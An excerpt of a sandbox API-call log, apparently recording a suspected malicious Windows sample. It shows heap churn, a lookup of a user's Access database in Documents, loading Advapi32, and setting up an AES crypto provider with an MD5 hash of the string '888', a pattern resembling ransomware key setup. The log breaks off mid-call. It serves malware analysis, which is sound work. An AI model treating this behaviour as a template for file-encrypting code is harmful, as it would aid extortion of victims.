returned 0x2aab128 [0215.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0215.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0215.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0215.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0215.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0215.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0215.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0215.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0215.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0215.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0215.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0215.448] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0215.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0215.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0215.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0215.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.449] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0215.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0215.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0215.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0215.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0215.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.450] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Database1.accdb", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 0x9e1eb8 [0215.450] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0215.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0215.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0215.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0215.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0215.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0215.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0215.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.452] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.452] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0215.453] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.453] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0215.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.454] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.454] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0215.454] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0215.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0215.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0215.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0215.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0215.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0215.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0215.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0215.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.455] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0215.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0215.455] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.455] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.455] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0215.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0215.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f71a0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0215.456] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c660) returned 1 [0215.456] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0215.456] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0215.456] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.457] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.457] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0215.457] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0215.457] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.457] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.457] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.457] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.457] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.457] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.457] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.457] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.457] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.457] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabb18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0215.457] CryptCreateHash (in: hProv=0xa7c660, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0215.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72648, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.457] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0215.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, 